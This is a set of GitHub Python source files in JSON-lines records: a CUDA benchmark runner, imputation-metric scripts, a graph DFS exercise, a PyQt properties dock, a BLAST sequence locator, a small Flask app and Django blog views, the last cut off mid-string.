+{"seq_id":"29910852538","text":"import argparse\n\nimport pandas as pd\nimport os\nimport subprocess\n\n\ndef run_one_run(mesh_size: int):\n bin_file = os.path.dirname(os.path.abspath(__file__)) + \"/../bin/cfdARCO\"\n\n time_microseconds_cudas = []\n time_microseconds_parallels = []\n\n for q in range(5):\n command_cuda = [bin_file, \"-L\", str(mesh_size), \"-d\", \"ln\", \"-t\", \"300\", \"-c\"]\n result_cuda = subprocess.run(command_cuda, capture_output=True, text=True)\n outs_cuda = result_cuda.stdout\n\n time_str_cuda = outs_cuda.split(\"\\n\")[-2].split(\" \")[-1].split(\"[\")[0]\n time_microseconds_cuda = int(time_str_cuda)\n time_microseconds_cudas.append(time_microseconds_cuda)\n\n for q in range(5):\n # command_parallel = [\"mpirun\", \"-n\", \"8\", bin_file, \"--skip_history\", \"-L\", str(mesh_size), \"-d\", \"ln\", \"-t\", \"300\"]\n # result_parallel = subprocess.run(command_parallel, capture_output=True, text=True)\n # outs_parallel = result_parallel.stdout\n\n # time_str_parallel = outs_parallel.split(\"\\n\")[-2].split(\" \")[-1].split(\"[\")[0]\n # time_microseconds_parallel = int(time_str_parallel)\n # time_microseconds_parallels.append(time_microseconds_parallel)\n time_microseconds_parallels.append(0)\n\n # print(f\"Res(mesh_size={mesh_size}) = cuda - {min(time_microseconds_cudas)} parallel - {min(time_microseconds_parallels)}\")\n print(f\"Res(mesh_size={mesh_size}) = cuda - {min(time_microseconds_cudas)} parallel - \")\n\n return time_microseconds_cudas, time_microseconds_parallels\n\n\ndef generate_report(mesh_sizes, output_file=\"report_cuda.csv\"):\n times_microseconds_cuda = []\n times_microseconds_parallel = []\n mesh_sizes_df = []\n for mesh_size in mesh_sizes:\n time_cur_cudas, time_cur_parallels = run_one_run(mesh_size)\n for time_cur_cuda, time_cur_parallel in zip(time_cur_cudas, time_cur_parallels):\n mesh_sizes_df.append(mesh_size)\n times_microseconds_cuda.append(time_cur_cuda)\n times_microseconds_parallel.append(time_cur_parallel)\n print(time_cur_cuda, time_cur_parallel)\n\n df_dict = {\"mesh_sizes\": mesh_sizes_df, \"times_microseconds_cuda\": times_microseconds_cuda,\n \"times_microseconds_parallel\": times_microseconds_parallel}\n df = pd.DataFrame(df_dict)\n df.to_csv(output_file)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(prog='cfdARCHO bench')\n parser.add_argument('-mf', '--mesh_size_from', required=False, type=int)\n parser.add_argument('-mt', '--mesh_size_to', required=False, type=int)\n parser.add_argument('-ms', '--mesh_size_step', required=False, type=int)\n parser.add_argument('-m', '--meshes', required=False, nargs='+', type=int)\n parser.add_argument('-o', '--out_file', required=False, default=\"report_cuda_history.csv\")\n\n args = parser.parse_args()\n\n if args.meshes is None:\n mesh_sizes = range(args.mesh_size_from, args.mesh_size_to, args.mesh_size_step)\n else:\n mesh_sizes = args.meshes\n generate_report(list(mesh_sizes), args.out_file)\n\n","repo_name":"yewhenp/cfdARCO","sub_path":"cfdARCO/scripts/test_cuda_execution.py","file_name":"test_cuda_execution.py","file_ext":"py","file_size_in_byte":3067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"19487024432","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport os\nimport numpy as np\nimport pandas as pd\nimport pathlib\n\nfrom utils.utils import rmse_loss, get_bins_from_numerical\nfrom evaluation.performance_metric import marginal_estimands, bivariate_estimands, house_bins\n\n# Load data\nmodel_names = [\"cart\", \"rf\", \"gain\", \"mida\"]\nnum_samples = 100\nnum_imputations = 10\n\nsave_name = \"house\"\nmiss_mechanism = \"MCAR\"\nfile_name = '../data/house_recoded.csv'\ndata_df = pd.read_csv(file_name)\ndata_x = data_df.values.astype(np.float32)\n\nnum_index = list(range(-8, 0))\ncat_index = list(range(-data_df.shape[1], -8))\n\n# Parameters\nno, dim = data_x.shape\n\n# seperate categorical variables and numerical variables\nif cat_index:\n data_cat_pop_df = data_df.iloc[:, cat_index]\n # get all possible levels for categorical variable\n all_levels = [np.unique(x) for x in data_x[:, cat_index].T]\n all_levels_dict = dict(zip(data_df.columns[cat_index], all_levels))\n # population estimands\n mar_Q, mar_Q_var = marginal_estimands(data_cat_pop_df, all_levels_dict)\n biv_Q, biv_Q_var = bivariate_estimands(data_cat_pop_df, all_levels_dict)\n # qualified index\n mar_index = (mar_Q * no > 10) & ((1 - mar_Q) * no > 10)\n biv_index = (biv_Q * no > 10) & ((1 - biv_Q) * no > 10)\n # performance metrics\n mar_qhat = np.empty(shape=(mar_Q.shape[0], num_samples))\n mar_qhat_var = np.empty(shape=(mar_Q_var.shape[0], num_samples))\n biv_qhat = np.empty(shape=(biv_Q.shape[0], num_samples))\n biv_qhat_var = np.empty(shape=(biv_Q_var.shape[0], num_samples))\n # initial imputed metrics\n mar_prob_impute = {}\n mar_var_impute = {}\n biv_prob_impute = {}\n biv_var_impute = {}\n\n\nif num_index:\n data_num_pop_df = data_df.iloc[:, num_index]\n if save_name != \"house2\":\n data_bin_pop_ls, bins = zip(*data_num_pop_df.apply(pd.qcut, 0, q=8, labels = False, retbins=True, duplicates=\"drop\"))\n data_bin_pop_df = pd.concat(data_bin_pop_ls, axis=1)\n else:\n bins = house_bins\n data_bin_pop_df = get_bins_from_numerical(data_num_pop_df, house_bins)\n # get all possible levels\n bin_all_levels = [np.unique(x) for x in data_bin_pop_df.values.T]\n bin_all_levels_dict = dict(zip(data_df.columns[num_index], bin_all_levels))\n # population estimands\n mar_bin_Q, mar_bin_Q_var = marginal_estimands(data_bin_pop_df, bin_all_levels_dict)\n biv_bin_Q, biv_bin_Q_var = bivariate_estimands(data_bin_pop_df, bin_all_levels_dict)\n # qualified index\n mar_bin_index = (mar_bin_Q * no > 10) & ((1 - mar_bin_Q) * no > 10)\n biv_bin_index = (biv_bin_Q * no > 10) & ((1 - biv_bin_Q) * no > 10)\n # performance metrics\n mar_bin_qhat = np.empty(shape=(mar_bin_Q.shape[0], num_samples))\n mar_bin_qhat_var = np.empty(shape=(mar_bin_Q_var.shape[0], num_samples))\n biv_bin_qhat = np.empty(shape=(biv_bin_Q.shape[0], num_samples))\n biv_bin_qhat_var = np.empty(shape=(biv_bin_Q_var.shape[0], num_samples))\n # initial imputed metrics\n mar_bin_prob_impute = {}\n mar_bin_var_impute = {}\n biv_bin_prob_impute = {}\n biv_bin_var_impute = {}\n\nmse = {}\n\nfor model_name in model_names:\n if cat_index:\n mar_prob_impute[model_name] = np.empty(shape=(mar_Q.shape[0], num_samples, num_imputations))\n mar_var_impute[model_name] = np.empty(shape=(mar_Q_var.shape[0], num_samples, num_imputations))\n biv_prob_impute[model_name] = np.empty(shape=(biv_Q.shape[0], num_samples, num_imputations))\n biv_var_impute[model_name] = np.empty(shape=(biv_Q_var.shape[0], 
num_samples, num_imputations))\n if num_index:\n mar_bin_prob_impute[model_name] = np.empty(shape=(mar_bin_Q.shape[0], num_samples, num_imputations))\n mar_bin_var_impute[model_name] = np.empty(shape=(mar_bin_Q_var.shape[0], num_samples, num_imputations))\n biv_bin_prob_impute[model_name] = np.empty(shape=(biv_bin_Q.shape[0], num_samples, num_imputations))\n biv_bin_var_impute[model_name] = np.empty(shape=(biv_bin_Q_var.shape[0], num_samples, num_imputations))\n\n # acc[model_name] = []\n mse[model_name] = []\n\nfor i in range(num_samples):\n # load samples\n data_i = np.loadtxt('../samples/{}/complete/sample_{}.csv'.format(save_name, i),\n delimiter=\",\").astype(np.float32)\n data_miss_i = np.loadtxt('../samples/{}/{}/sample_{}.csv'.format(save_name, miss_mechanism, i),\n delimiter=\",\").astype(np.float32)\n data_m = 1 - np.isnan(data_miss_i).astype(np.float32)\n # seperate categorical variables and numerical variables\n if cat_index:\n data_cat = data_i[:, cat_index]\n data_m_cat = data_m[:, cat_index]\n data_cat_df = pd.DataFrame(data=data_cat,\n index=list(range(data_cat.shape[0])),\n columns=data_df.columns[cat_index])\n # marginal prob and bivariate prob before introduce missingness\n mar_qhat[:, i], mar_qhat_var[:, i] = marginal_estimands(data_cat_df, all_levels_dict)\n biv_qhat[:, i], biv_qhat_var[:, i] = bivariate_estimands(data_cat_df, all_levels_dict)\n if num_index:\n data_num = data_i[:, num_index]\n data_m_num = data_m[:, num_index]\n data_num_df = pd.DataFrame(data=data_num,\n index=list(range(data_num.shape[0])),\n columns=data_df.columns[num_index])\n data_bin_df = get_bins_from_numerical(data_num_df, bins)\n # marginal prob and bivariate prob before introduce missingness\n mar_bin_qhat[:, i], mar_bin_qhat_var[:, i] = marginal_estimands(data_bin_df, bin_all_levels_dict)\n biv_bin_qhat[:, i], biv_bin_qhat_var[:, i] = bivariate_estimands(data_bin_df, bin_all_levels_dict)\n\n for model_name in model_names:\n print(\"{}th sample, model: {}\".format(i, model_name))\n for l in range(num_imputations):\n # loading imputations\n if model_name == \"gain\" or model_name == \"mida\":\n data_imputed = np.loadtxt('../results/{}/{}/{}/imputed_{}_{}.csv'.format(save_name, miss_mechanism, model_name, i, l),delimiter=\",\").astype (np.float32)\n if model_name == \"cart\" or model_name ==\"rf\":\n data_imputed = pd.read_csv('../results/{}/{}/{}/imputed_{}_{}.csv'.format(save_name, miss_mechanism, model_name, i, l)).values.astype(np.float32)\n # report accuracy\n mse[model_name].append(rmse_loss(data_i, data_imputed, data_m))\n # seperate categorical variables an d numerical variables\n if cat_index:\n imputed_cat = data_imputed[:, cat_index]\n imputed_cat_df = pd.DataFrame(data=imputed_cat,\n index=list(range(imputed_cat.shape[0])),\n columns=data_df.columns[cat_index])\n # get imputed marginal prob and biviate prob for ith sample\n mar_prob_impute[model_name][:, i, l], mar_var_impute[model_name][:, i, l] = marginal_estimands(\n imputed_cat_df, all_levels_dict)\n biv_prob_impute[model_name][:, i, l], biv_var_impute[model_name][:, i, l] = bivariate_estimands(\n imputed_cat_df, all_levels_dict)\n if num_index:\n imputed_num = data_imputed[:, num_index]\n imputed_num_df = pd.DataFrame(data=imputed_num,\n index=list(range(imputed_num.shape[0])),\n columns=data_df.columns[num_index])\n imputed_bin_df = get_bins_from_numerical(imputed_num_df, bins)\n # get imputed marginal prob and biviate prob for ith sample\n mar_bin_prob_impute[model_name][:, i, l], mar_bin_var_impute[model_name][:, i, l] = 
marginal_estimands(imputed_bin_df, bin_all_levels_dict)\n biv_bin_prob_impute[model_name][:, i, l], biv_bin_var_impute[model_name][:, i, l] = bivariate_estimands(imputed_bin_df, bin_all_levels_dict)\n pass\n pass\n pass\n\n# save estimands\nsave_path = \"../metrics/{}/{}\".format(save_name, miss_mechanism)\npathlib.Path(save_path).mkdir(parents=True, exist_ok=True)\nif cat_index:\n # population estimands\n np.save(os.path.join(save_path, \"mar_Q\"), mar_Q)\n np.save(os.path.join(save_path, \"mar_Q_var\"), mar_Q_var)\n np.save(os.path.join(save_path, \"biv_Q\"), biv_Q)\n np.save(os.path.join(save_path, \"biv_Q_var\"), biv_Q_var)\n # premiss estimands\n np.save(os.path.join(save_path, \"mar_qhat\"), mar_qhat)\n np.save(os.path.join(save_path, \"mar_qhat_var\"), mar_qhat_var)\n np.save(os.path.join(save_path, \"biv_qhat\"), biv_qhat)\n np.save(os.path.join(save_path, \"biv_qhat_var\"), biv_qhat_var)\n # imputed estimands\n np.save(os.path.join(save_path, \"mar_prob_impute\"), mar_prob_impute)\n np.save(os.path.join(save_path, \"mar_var_impute\"), mar_var_impute)\n np.save(os.path.join(save_path, \"biv_prob_impute\"), biv_prob_impute)\n np.save(os.path.join(save_path, \"biv_var_impute\"), biv_var_impute)\nif num_index:\n # population estimands\n np.save(os.path.join(save_path, \"mar_bin_Q\"), mar_bin_Q)\n np.save(os.path.join(save_path, \"mar_bin_Q_var\"), mar_bin_Q_var)\n np.save(os.path.join(save_path, \"biv_bin_Q\"), biv_bin_Q)\n np.save(os.path.join(save_path, \"biv_bin_Q_var\"), biv_bin_Q_var)\n # performance metrics\n np.save(os.path.join(save_path, \"mar_bin_qhat\"), mar_bin_qhat)\n np.save(os.path.join(save_path, \"mar_bin_qhat_var\"), mar_bin_qhat_var)\n np.save(os.path.join(save_path, \"biv_bin_qhat\"), biv_bin_qhat)\n np.save(os.path.join(save_path, \"biv_bin_qhat_var\"), biv_bin_qhat_var)\n # initial imputed metrics\n np.save(os.path.join(save_path, \"mar_bin_prob_impute\"), mar_bin_prob_impute)\n np.save(os.path.join(save_path, \"mar_bin_var_impute\"), mar_bin_var_impute)\n np.save(os.path.join(save_path, \"biv_bin_prob_impute\"), biv_bin_prob_impute)\n np.save(os.path.join(save_path, \"biv_bin_var_impute\"), biv_bin_var_impute)\n\nnp.save(os.path.join(save_path, \"mse\"), mse)","repo_name":"zhenhua-wang/MissingData_DL","sub_path":"evaluation/calculate_estimands.py","file_name":"calculate_estimands.py","file_ext":"py","file_size_in_byte":10153,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"16"}
+{"seq_id":"33043266078","text":"import sys\r\nsys.setrecursionlimit(10000)\r\ninput = sys.stdin.readline\r\n\r\nn, m = map(int, input().split())\r\n\r\nroot = [[] for _ in range(n+1)]\r\nvisited = [False for _ in range(n+1)]\r\ncount = 0\r\n\r\n\r\nfor _ in range(m):\r\n u, v = map(int, input().split())\r\n \r\n root[u].append(v)\r\n root[v].append(u)\r\n \r\n\r\n\r\ndef DFS(now):\r\n visited[now] = True\r\n for i in root[now]:\r\n if not visited[i]:\r\n DFS(i)\r\n \r\nfor i in range(1, n+1):\r\n if not visited[i]:\r\n count += 1\r\n DFS(i)\r\n \r\nprint(count)\r\n \r\n\r\n","repo_name":"MiniMini-On/Algorithm","sub_path":"백준/Silver/11724. 연결 요소의 개수/연결 요소의 개수.py","file_name":"연결 요소의 개수.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"37866282748","text":"from utils import Utils\nfrom object import Object\nfrom pyqtcore import QString\nfrom propertybrowser import PropertyBrowser\nfrom documentmanager import DocumentManager\nfrom changeproperties import SetProperty, RemoveProperty, RenameProperty\nfrom PyQt5.QtCore import (\n Qt,\n QSize,\n QEvent\n)\nfrom PyQt5.QtGui import (\n QIcon,\n QKeySequence\n)\nfrom PyQt5.QtWidgets import (\n QWidget,\n QVBoxLayout,\n QToolBar,\n QLineEdit, \n QInputDialog,\n QAction,\n QDockWidget\n)\ndef isExternal(object):\n if (not object):\n return False\n x = object.typeId()\n if x==Object.TilesetType:\n return object.isExternal()\n elif x==Object.TileType:\n return object.tileset().isExternal()\n elif x==Object.TerrainType:\n return object.tileset().isExternal()\n else:\n return False\n\nclass PropertiesDock(QDockWidget):\n\n def __init__(self, parent = None):\n super().__init__(parent)\n self.mMapDocument = None\n self.mPropertyBrowser = PropertyBrowser()\n\n self.setObjectName(\"propertiesDock\")\n self.mActionAddProperty = QAction(self)\n self.mActionAddProperty.setEnabled(False)\n self.mActionAddProperty.setIcon(QIcon(\":/images/16x16/add.png\"))\n self.mActionAddProperty.triggered.connect(self.addProperty)\n self.mActionRemoveProperty = QAction(self)\n self.mActionRemoveProperty.setEnabled(False)\n self.mActionRemoveProperty.setIcon(QIcon(\":/images/16x16/remove.png\"))\n self.mActionRemoveProperty.triggered.connect(self.removeProperty)\n self.mActionRenameProperty = QAction(self)\n self.mActionRenameProperty.setEnabled(False)\n self.mActionRenameProperty.setIcon(QIcon(\":/images/16x16/rename.png\"))\n self.mActionRenameProperty.triggered.connect(self.renameProperty)\n Utils.setThemeIcon(self.mActionAddProperty, \"add\")\n Utils.setThemeIcon(self.mActionRemoveProperty, \"remove\")\n Utils.setThemeIcon(self.mActionRenameProperty, \"rename\")\n toolBar = QToolBar()\n toolBar.setFloatable(False)\n toolBar.setMovable(False)\n toolBar.setIconSize(QSize(16, 16))\n toolBar.addAction(self.mActionAddProperty)\n toolBar.addAction(self.mActionRemoveProperty)\n toolBar.addAction(self.mActionRenameProperty)\n widget = QWidget(self)\n layout = QVBoxLayout(widget)\n layout.setContentsMargins(5, 5, 5, 5)\n layout.setSpacing(0)\n layout.addWidget(self.mPropertyBrowser)\n layout.addWidget(toolBar)\n widget.setLayout(layout)\n self.setWidget(widget)\n manager = DocumentManager.instance()\n manager.currentDocumentChanged.connect(self.mapDocumentChanged)\n self.mPropertyBrowser.currentItemChangedSignal.connect(self.currentItemChanged)\n self.retranslateUi()\n\n def bringToFront(self):\n self.show()\n self.raise_()\n self.mPropertyBrowser.setFocus()\n\n def event(self, event):\n x = event.type()\n if x==QEvent.KeyPress or x==QEvent.ShortcutOverride:\n keyEvent = event\n if (keyEvent.matches(QKeySequence.Delete) or keyEvent.key() == Qt.Key_Backspace):\n if event.type() == QEvent.KeyPress:\n self.removeProperty()\n event.accept()\n return True\n elif x==QEvent.LanguageChange:\n self.retranslateUi()\n else:\n pass\n\n return super().event(event)\n\n def mapDocumentChanged(self, mapDocument):\n if type(mapDocument)==list:\n mapDocument = mapDocument[0]\n if (self.mMapDocument):\n self.mMapDocument.disconnect()\n self.mMapDocument = mapDocument\n self.mPropertyBrowser.setMapDocument(mapDocument)\n if (mapDocument):\n mapDocument.currentObjectChanged.connect(self.currentObjectChanged)\n mapDocument.tilesetFileNameChanged.connect(self.tilesetFileNameChanged)\n 
mapDocument.editCurrentObject.connect(self.bringToFront)\n self.currentObjectChanged(mapDocument.currentObject())\n else:\n self.currentObjectChanged(None)\n\n def currentObjectChanged(self, object):\n if type(object)==list and len(object)>0:\n object = object[0]\n self.mPropertyBrowser.setObject(object)\n enabled = object != None and not isExternal(object)\n self.mPropertyBrowser.setEnabled(enabled)\n self.mActionAddProperty.setEnabled(enabled)\n\n def currentItemChanged(self, item):\n isCustomProperty = self.mPropertyBrowser.isCustomPropertyItem(item)\n external = isExternal(self.mPropertyBrowser.object())\n self.mActionRemoveProperty.setEnabled(isCustomProperty and not external)\n self.mActionRenameProperty.setEnabled(isCustomProperty and not external)\n\n def tilesetFileNameChanged(self, tileset):\n object = self.mMapDocument.currentObject()\n if (not object):\n return\n update = False\n x = object.typeId()\n if x==Object.TilesetType:\n update = object == tileset\n elif x==Object.TileType:\n update = object.tileset() == tileset\n elif x==Object.TerrainType:\n update = object.tileset() == tileset\n else:\n pass\n\n if (update):\n self.currentObjectChanged(object)\n self.currentItemChanged(self.mPropertyBrowser.currentItem())\n\n def addProperty(self, *args):\n l = len(args)\n if l==0:\n property, ok = QInputDialog.getText(self.mPropertyBrowser, self.tr(\"Add Property\"),\n self.tr(\"Name:\"), QLineEdit.Normal,'')\n if ok:\n self.addProperty(property)\n elif l==1:\n arg1 = args[0]\n tp = type(arg1)\n if tp==bool:\n self.addProperty()\n elif tp in [str, QString]:\n name = arg1\n if name=='':\n return\n object = self.mMapDocument.currentObject()\n if (not object):\n return\n if (not object.hasProperty(name)):\n undoStack = self.mMapDocument.undoStack()\n undoStack.push(SetProperty(self.mMapDocument, self.mMapDocument.currentObjects(), name, QString()))\n\n self.mPropertyBrowser.editCustomProperty(name)\n\n def removeProperty(self):\n item = self.mPropertyBrowser.currentItem()\n object = self.mMapDocument.currentObject()\n if (not item or not object):\n return\n name = item.property().propertyName()\n undoStack = self.mMapDocument.undoStack()\n items = item.parent().children()\n if items.count() > 1:\n currentItemIndex = items.indexOf(item)\n if item == items.last():\n self.mPropertyBrowser.setCurrentItem(items.at(currentItemIndex - 1))\n else:\n self.mPropertyBrowser.setCurrentItem(items.at(currentItemIndex + 1))\n\n undoStack.push(RemoveProperty(self.mMapDocument, self.mMapDocument.currentObjects(), name))\n\n def renameProperty(self, *args):\n l = len(args)\n if l==0:\n item = self.mPropertyBrowser.currentItem()\n if (not item):\n return\n oldName = item.property().propertyName()\n dialog = QInputDialog(self.mPropertyBrowser)\n dialog.setInputMode(QInputDialog.TextInput)\n dialog.setLabelText(self.tr(\"Name:\"))\n dialog.setTextValue(oldName)\n dialog.setWindowTitle(self.tr(\"Rename Property\"))\n dialog.open(self.renameProperty)\n elif l==1:\n name = args[0]\n if (name.isEmpty()):\n return\n item = self.mPropertyBrowser.currentItem()\n if (not item):\n return\n oldName = item.property().propertyName()\n if (oldName == name):\n return\n undoStack = self.mMapDocument.undoStack()\n undoStack.push(RenameProperty(self.mMapDocument, self.mMapDocument.currentObjects(), oldName, name))\n\n def retranslateUi(self):\n self.setWindowTitle(self.tr(\"Properties\"))\n self.mActionAddProperty.setText(self.tr(\"Add Property\"))\n self.mActionRemoveProperty.setText(self.tr(\"Remove Property\"))\n 
self.mActionRenameProperty.setText(self.tr(\"Rename Property\"))\n","repo_name":"theall/Python-Tiled","sub_path":"src/tiled/propertiesdock.py","file_name":"propertiesdock.py","file_ext":"py","file_size_in_byte":8453,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"5670186536","text":"\nimport config\n\nfrom pprint import pprint\n\nimport blast\nimport ranges\n\n\ndef locate_sequence(seq, genome, check_uniq=True, evalue_threshold=1e-40,\n hsp_align_len_threshold=None, hsp_identity_threshold=None):\n\n blast_dir = config.CACHE_DIR / 'blast'\n blast_dir.mkdir(exist_ok=True)\n\n res = blast.prepare_blast_db(genome, blast_dir, db_type='nucl',\n skip_if_exists=True)\n db_path = res['db_path']\n\n res = blast.blast_seqs([{'seq': seq, 'name': 'seq'}],\n db_path, blast_program='blastn',\n evalue_threshold=evalue_threshold)\n\n subjects = list(res['seq'].keys())\n if check_uniq:\n if len(subjects) > 1:\n raise RuntimeError('Sequence found in several subjects')\n\n locations = []\n for subject, hsps in res['seq'].items():\n hsps = blast.filter_hsps_by_align_len(hsps, hsp_align_len_threshold)\n hsps = blast.filter_hsps_by_identity(hsps, hsp_identity_threshold)\n\n subject_ranges = []\n for hsp in hsps:\n subject_ranges.append({'chrom': subject,\n 'start': hsp['subject_start'],\n 'end': hsp['subject_end'],\n 'strand': '+' if hsp['subject_strand'] == 1 else '-'})\n subject_ranges = ranges.merge_ranges(subject_ranges)\n for range_ in subject_ranges:\n locations.append({'subject': subject,\n 'start': range_['start'],\n 'end': range_['end'],\n 'strand': range_['strand']\n })\n\n if check_uniq:\n if len(locations) > 1:\n raise RuntimeError('Sequence found in several subjects')\n\n return locations\n\n\nif __name__ == '__main__':\n seq = 'AGACAAGTGGTGAAGAAKAAGATGATATGCAGCAATGCATTTCACCACTTTATATAGCATGGAGTGGATTTCTCCACCTCATTTAATAGTATGAAGTGGAGGCAGCCCCCCTCTACACCTGTCCACTAAGGCCAGCCCACAATCTGATCCCTTTTAATTTTTGCCTTGAGTGGTGGGGCCCATTGGATTAAATCAATCCAAATTAGCCAC'\n locations = locate_sequence(seq, config.TOMATO_GENOME_FASTA, check_uniq=False,\n hsp_align_len_threshold=70, hsp_identity_threshold=95)\n pprint(locations)","repo_name":"bioinfcomav/tomato_haplotype_paper_old","sub_path":"src/locate_seq_using_blast.py","file_name":"locate_seq_using_blast.py","file_ext":"py","file_size_in_byte":2272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"226250619","text":"# coding: utf-8\nfrom flask import Flask\nfrom flask import render_template\n\nimport gspread\nfrom oauth2client.client import SignedJwtAssertionCredentials\nimport json\n\nimport urllib\nimport urllib2\nfrom BeautifulSoup import BeautifulSoup\nimport random\nfrom flask import request\nfrom flask.ext.cache import Cache\n\nfrom save_historians import *\nimport time\nimport random\n\napp = Flask(__name__)\napp.config['CACHE_TYPE'] = 'simple'\napp.cache = Cache(app, config={\n 'CACHE_TYPE': 'filesystem',\n 'CACHE_DIR': 'cache-dir',\n 'CACHE_DEFAULT_TIMEOUT': 922337203685477580,\n 'CACHE_THRESHOLD': 922337203685477580\n })\n\n@app.route(\"/\")\ndef main():\n\treturn 'nginx is running'\n\n@app.route(\"/historyofgreats\")\ndef historyofgreats():\n\tcached = app.cache.get('main')\n\tif cached:\n\t\treturn cached\n\tworksheet = setWorkSheet()\n\tdata = worksheet.get_all_values()\n\tresult = render_template('graphs.html',data=data)\n\tapp.cache.set('main', result)\n\treturn result\n\n@app.route(\"/claim\", methods=[\"POST\"])\ndef claim():\n\tclaimtype = request.form.get('claimtype')\n\tmsg = request.form.get('msg')\n\tresult = saveClaim(claimtype,msg)\n\treturn json.dumps(result)\n\n@app.route(\"/add\", methods=[\"POST\"])\ndef add():\n\tname = request.form.get('name')\n\tresult = addHistory(name)\n\tif result['resultCode'] == '1':\n\t\tapp.cache.delete('main')\n\treturn json.dumps(result)\n\n#Flush Cache\n@app.route(\"/cache_flush/\")\ndef cache_flush(key_name):\n\tapp.cache.delete(key_name)\n\treturn 'Done: [ ' + key_name + ' ] is Deleted'\n\n#test\n@app.route(\"/test/\")\ndef test(name):\n\tresult = getinfoWiki(name)\n\treturn json.dumps(result)\n\nif __name__ == \"__main__\":\n \tapp.run('0.0.0.0',8080,debug=True)\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"bumkyulee/historyofgreats","sub_path":"hello.py","file_name":"hello.py","file_ext":"py","file_size_in_byte":1693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"36174493238","text":"from django.http import HttpResponse, Http404\nfrom django.shortcuts import render, redirect, get_object_or_404\nfrom datetime import datetime\nfrom blog.models import Article\nfrom .forms import ContactForm, ArticleForm\n\n\ndef accueil(request):\n \"\"\" Afficher tous les articles de notre blog \"\"\"\n articles = Article.objects.all() # Nous sélectionnons tous nos articles\n return render(request, 'blog/accueil.html', {'derniers_articles': articles})\n\n\ndef lire(request, id, slug):\n article = get_object_or_404(Article, id=id, slug=slug)\n return render(request, 'blog/lire.html', {'article': article})\n\n\ndef home(request):\n \"\"\" Exemple de page non valide au niveau HTML pour que l'exemple soit concis \"\"\"\n # return HttpResponse(\"\"\"\n #
Bienvenue sur mon blog !
\n #
Les crêpes bretonnes ça tue des mouettes en plein vol !